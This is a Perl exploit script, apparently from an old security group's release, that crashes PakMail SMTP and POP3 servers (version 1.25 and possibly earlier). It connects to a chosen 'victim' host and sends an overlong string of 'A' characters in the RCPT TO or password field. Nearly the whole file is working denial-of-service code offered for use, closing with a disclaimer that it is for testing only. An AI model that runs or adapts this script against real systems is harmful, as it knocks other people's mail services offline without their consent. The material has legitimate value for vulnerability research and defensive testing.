#!/usr/bin/perl
 
################################################
# Rewted Network Security Labs www.rewted.org  #
#					       #
# Exploits a buffer overrun on PakMail	       #
# SMTP and POP3 servers.		       #
# Vulnerable version 1.25 and probably below.  #
# Vendor: www.pak.net			       #
#                                	       #
# Exploited by slackee warminx@null.rewted.org #
################################################

use IO::Socket;
use Getopt::Std;
getopts('h:t', \%args);
if(!defined($args{h}) && !defined($args{t})) { 
print qq~Rewted Network Security Labs www.rewted.org\nUsage:   $0 -h <victim> -t <type>

		-h hostname to test bof
		-t server type to DoS   (1 = SMTP)
					(2 = POP3)

~; exit; }
if(defined($args{h}) && defined($args{t})){
if(($args{t}) == 1) { &pakmail; } 
if(($args{t}) == 2) { &pakpop; }}

sub pakmail {
$victim=$args{h};
$denial .= "A" x 1390;
	$socket = IO::Socket::INET->new (Proto => "tcp",
					 PeerAddr => $victim,
					 PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: test\@localhost\n";
print $socket "RCPT TO: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }

sub pakpop {
$victim=$args{h};
$denial .= "A" x 1400;
	$socket = IO::Socket::INET->new (Proto => "tcp",
					 PeerAddr => $victim,
					 PeerPort => "110") or die "Can't connect.\n";
print $socket "user test\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }

# Neither I or Rewted Network Security Labs is liable for usage of this script.
# This is for testing purposes only, use at your own risk.